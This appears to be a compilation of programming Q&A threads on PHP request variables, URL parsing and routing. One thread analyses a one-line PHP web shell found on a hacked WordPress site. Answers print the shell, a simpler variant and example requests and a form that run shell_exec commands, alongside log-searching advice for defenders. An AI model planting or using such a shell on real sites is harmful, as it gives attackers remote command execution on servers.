I couldn't find the Python equivalent of PHP's $_SERVER.
Is there one? Or what are the methods to get equivalent results?
Thanks in advance.
Using mod_wsgi, which I would recommend over mod_python (long story but trust me) ... Your application is passed an environment variable such as:
def application(environ, start_response):
...
And the environment contains typical elements from $_SERVER in PHP
...
environ['REQUEST_URI']
...
And so on.
http://www.modwsgi.org/
Good Luck
REVISION
The real correct answer is to use something like Flask.
You don't state it explicitly, but I assume you are using mod_python? If so, (and if you don't want to use mod_wsgi instead as suggested earlier) take a look at the documentation for the request object. It contains most of the attributes you'd find in $_SERVER.
For example, to get the full URI of the request, you'd do this:
from mod_python import apache

def yourHandler(req):
    # parsed_uri is a tuple of URI components; URI_QUERY selects the part after '?'
    querystring = req.parsed_uri[apache.URI_QUERY]
The querystring attribute will now contain the request's querystring, that is, the part after the '?'. (So, for http://www.example.com/index?this=test, querystring would be this=test)
I need to extract 3 input parameters (in this example a=test, b=sell, c=12536) from the following URL
/property-test-sell-12536
and pass them to the PHP file as $_GET parameters. Inside the PHP file I want to access these parameters as $_GET['a'], $_GET['b'], $_GET['c'].
I searched Google about this issue. Is it possible to use only NGINX for this purpose, or should I do it inside the PHP file?
Input arguments are defined as ?index=value&anotherIndex=anotherValue and so forth, for example: https://example.com/search.php?query=How+to+google&lang=en
PHP will then have the variables named as the appropriate index ($_GET['index'] will return you the value).
If you'd like to have routes like example.com/shoes/5/seller then you'd need to code a custom PHP function which trims the URL and looks for strings and then stores them in an appropriate variable, probably using a regex and preg_match. Though, be careful about security as these can be rather vulnerable to things like SQL injections and server-side code execution vulnerabilities.
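As an added example (not code from the question or the answer above), here is the PHP-side parser the answer describes for the question's own pattern, /property-test-sell-12536. It assumes the webserver hands the original path to the script in $_SERVER['REQUEST_URI']; the anchored regex rejects anything that does not have the expected shape before it reaches $_GET, and a comment shows the nginx-only rewrite alternative (an assumed configuration, not from the answer).

```php
<?php
// Added example: parse /property-<a>-<b>-<c> into $_GET['a'], $_GET['b'], $_GET['c'].
// Assumes the server passes the original path in $_SERVER['REQUEST_URI'].
// Doing it in nginx alone (assumed config, not from the answer) would be:
//   rewrite ^/property-([a-z0-9]+)-([a-z0-9]+)-(\d+)$ /property.php?a=$1&b=$2&c=$3 last;

declare(strict_types=1);

/**
 * Parse "/property-test-sell-12536" into ['a' => 'test', 'b' => 'sell', 'c' => '12536'].
 * Returns null when the path does not have the expected shape.
 */
function parsePropertyRoute(string $path): ?array
{
    // Only the path is routed; drop any query string first.
    $path = parse_url($path, PHP_URL_PATH);
    if (!is_string($path)) {
        return null;
    }
    // Anchored pattern with a fixed character class and length per segment,
    // so unexpected input yields null instead of an arbitrary string.
    if (!preg_match('~^/property-([a-z0-9]{1,32})-([a-z0-9]{1,32})-(\d{1,10})$~', $path, $m)) {
        return null;
    }
    return ['a' => $m[1], 'b' => $m[2], 'c' => $m[3]];
}

// Populate $_GET as the question asks, but only from a validated match.
$params = parsePropertyRoute($_SERVER['REQUEST_URI'] ?? '/');
if ($params === null) {
    http_response_code(404);
    exit('Not found');
}
$_GET = array_merge($_GET, $params);

// The rest of the file can now read $_GET['a'], $_GET['b'] and $_GET['c'].
echo htmlspecialchars($_GET['a']), ' ', htmlspecialchars($_GET['b']), ' ', (int) $_GET['c'], PHP_EOL;
```

Run from the CLI there is no REQUEST_URI, so the script answers 404; under a webserver a request for /property-test-sell-12536 prints "test sell 12536".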
I extracted this from a WordPress site that happened to be infected and is being cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps JavaScript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject JavaScript), for example. But it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=#$_GET[2]).#$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
I already posted it as a comment since the question was on hold, here now as an answer:
It's a PHP shell. If you rewrite it to <?php ($_=#$_GET[2]).#$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
As Reeno already said in a comment, it's like a PHP shell.
Explanation
Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.
$_=#$_GET[2]
Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.
#$_($_POST[1])
The # operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements actually does nothing important. It could be rewritten like this:
$_=#$_GET[2];
#$_($_POST[1]);
Use case
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.
First of all, you must remove those lines as soon as possible.
This code is used to call PHP functions. To give you an example, your hacker will use this kind of form:
<form method="post" action="http://site.com/page.php?2=shell_exec">
<input name="1" value="ipconfig -all"/>
<input type="submit" value="Send"/>
</form>
You'll then get these values:
$_ = $_GET[2] = shell_exec
$_POST[1] = ipconfig -all
$_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")
# are here to disable errors.
A simpler example would be to use this code:
<?= #$_GET['c'](#$_GET['p']); ?>
With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .
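The two explanations above (the $_GET[2]/$_POST[1] variant and the $_GET['c']/$_GET['p'] variant) both end with the same defender's question: was the shell actually used? As an added example (not from any answer here), this PHP script generalizes the egrep suggested earlier to an access-log scan that flags any query parameter whose value is the name of a high-risk PHP function, whatever the parameter is called. The log lines are constructed for the example; as noted above, POST bodies never reach the access log, so only the function-name half of a GET+POST invocation is visible.

```php
<?php
// Added example: find requests that pass a PHP function name in the query
// string, the way the tiny shell above is driven. Only GET data is in the
// access log, so the POST argument half of an invocation is not visible.

declare(strict_types=1);

// Function names an attacker would typically place in the "2"/"c" parameter.
const RISKY_FUNCTIONS = [
    'shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open',
    'assert', 'create_function', 'file_put_contents', 'call_user_func',
];

/**
 * Return one finding per suspicious request:
 * [line number, client IP, parameter name, function name].
 */
function findShellInvocations(array $logLines): array
{
    $findings = [];
    foreach ($logLines as $i => $line) {
        // Combined log format: client IP first, request line in quotes.
        if (!preg_match('/^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        $query = parse_url($m[2], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue; // nested array parameters are not function names
            }
            // PHP function names are case-insensitive, so normalise first.
            $fn = strtolower(trim($value));
            if (in_array($fn, RISKY_FUNCTIONS, true)) {
                $findings[] = [$i + 1, $m[1], (string) $name, $fn];
            }
        }
    }
    return $findings;
}

// Constructed sample log lines (not real traffic).
$sample = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-content/file.php?2=shell_exec HTTP/1.1" 200 88',
    '203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /page.php?c=SYSTEM&p=id HTTP/1.1" 200 41',
];
foreach (findShellInvocations($sample) as [$lineNo, $ip, $param, $fn]) {
    echo "line $lineNo: $ip passed $fn in parameter '$param'\n";
}
```

The first sample line is ordinary traffic and produces nothing; the second and third are reported, which is the signal to correlate with the time the shell file appeared.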
As far as I know PHP has a function to get the '/foo/bar/' out of a URL like: 'http://someplace.com/index.php/foo/bar/'
Can't remember what the function is called.
[edit]
I remember using something like this in ExpressionEngine (see this), and later coming across an article explaining such a function built in PHP. However I can't recall what it was.
[edit #2]
I know that there are functions to get out the URL and several to manipulate it. However I clearly remember that there was one function doing just this specific thing. Look at the ExpressionEngine example I linked to to get a better understanding of what I mean.
[edit #3]
It wasn't ExpressionEngine I had used. It was CodeIgniter. But it's basically the same thing.
[edit #4]
Maybe I am wrong. I just remember walking over just such a function in an article once...
Case closed (unless someone stumbles upon just such a function).
I believe you are looking for parse_url.
parse_url('http://someplace.com/index.php/foo');
/*
Array
(
[scheme] => http
[host] => someplace.com
[path] => /index.php/foo
)
*/
You can then manipulate the path item to remove /index.php.
It's not a function. It's a variable: $_SERVER['PATH_INFO']
That's $_SERVER['PATH_INFO']. It may not be available on all systems; it's dependent on the webserver passing it on. In Apache, that's the AcceptPathInfo option.
response to gregoire:
It's impossible to pull out path_info from a url with 100% reliability unless it's being done on the webserver handling that url at the time - you cannot tell where the actual script part ends and the path_info starts, especially if the path is something like
/a/b/c/scriptishere/path/info
There's no '.html', or '.php', or '.aspx' or whatever to even give you a hint. As such, this is the only way to 100% reliably answer the OP's question. Anything else is a guess - even "index.php" in the OP's sample could be a directory and the actual script is 'foo'.
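The point above is that only the webserver knows where the script name ends, and it does tell PHP: as $_SERVER['SCRIPT_NAME']. As an added example (not code from any answer here), this derives the path-info part from SCRIPT_NAME when PATH_INFO is not passed on, and splits it into segments safely. The $_SERVER-like array at the bottom is constructed for the example.

```php
<?php
// Added example: recover "/foo/bar/" without guessing where the script ends.
// Uses PATH_INFO when the server provides it, otherwise strips the
// server-resolved SCRIPT_NAME prefix from the request path.

declare(strict_types=1);

/** $server is shaped like $_SERVER. Returns '' for no path info, null if undeterminable. */
function pathInfoFromServer(array $server): ?string
{
    if (isset($server['PATH_INFO']) && $server['PATH_INFO'] !== '') {
        return $server['PATH_INFO'];
    }
    $path = parse_url($server['REQUEST_URI'] ?? '/', PHP_URL_PATH);
    $script = $server['SCRIPT_NAME'] ?? '';
    if (!is_string($path) || $script === '') {
        return null;
    }
    if ($path === $script) {
        return '';
    }
    // Require the prefix plus a slash, so "/index.php2" is not taken for "/index.php".
    if (strncmp($path, $script . '/', strlen($script) + 1) === 0) {
        return substr($path, strlen($script));
    }
    return null; // the request was not routed through this script
}

/** Split path info into decoded, non-empty segments, dropping "." and "..". */
function pathSegments(string $pathInfo): array
{
    $segments = [];
    foreach (explode('/', trim($pathInfo, '/')) as $seg) {
        $seg = rawurldecode($seg);
        if ($seg === '' || $seg === '.' || $seg === '..') {
            continue;
        }
        $segments[] = $seg;
    }
    return $segments;
}

// Constructed input: the server resolved /index.php as the script.
$fake = ['REQUEST_URI' => '/index.php/foo/bar/?x=1', 'SCRIPT_NAME' => '/index.php'];
$info = pathInfoFromServer($fake);
var_dump($info);
print_r(pathSegments($info ?? ''));
```

This also handles the extension-less case raised above, such as a script resolved at /a/b/c/scriptishere, because SCRIPT_NAME carries that boundary regardless of how the path looks.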
If the string is always going to have index.php in it, why not just substr, like so:
$url = "http://someplace.com/index.php/foo/bar/";
$delim = 'index.php';
$path = substr($url,strpos($url,$delim)+strlen($delim));
That's a little verbose, but if you could clarify where this string is coming from and what parts are going to change I could give a more concise answer.
You could also use regular expressions:
$url = "http://someplace.com/index.php/foo/bar/";
$matches = array();
// delimiters added, the dot escaped, and the subject string passed as the second argument
preg_match('/index\.php\/(.*)$/', $url, $matches);
$matches will contain the matched string in index 1, index 0 will be the original string.
I didn't test that regex, but something like that should work.
How can I use download.php?get=file.exe without the get variable, like download.php?=file.exe, using $_GET in PHP?
You can use $_GET[0] or $_REQUEST[0]
You could use $_SERVER['request_uri'] which would allow you to omit the ? completely, leaving you with URLs like example.com/download.php/file.exe
Then, with a bit of URL rewriting (or implementing a bootstrap controller) you could clean it up even more, resulting in example.com/download/file.exe
What you need is address rewriting; this Wikipedia article should give you enough information to start with. Specifically, if you use Apache, read about mod_rewrite.
You can use $_SERVER['QUERY_STRING'] to get everything after the ?.
Edit: Then you could use download.php?file.exe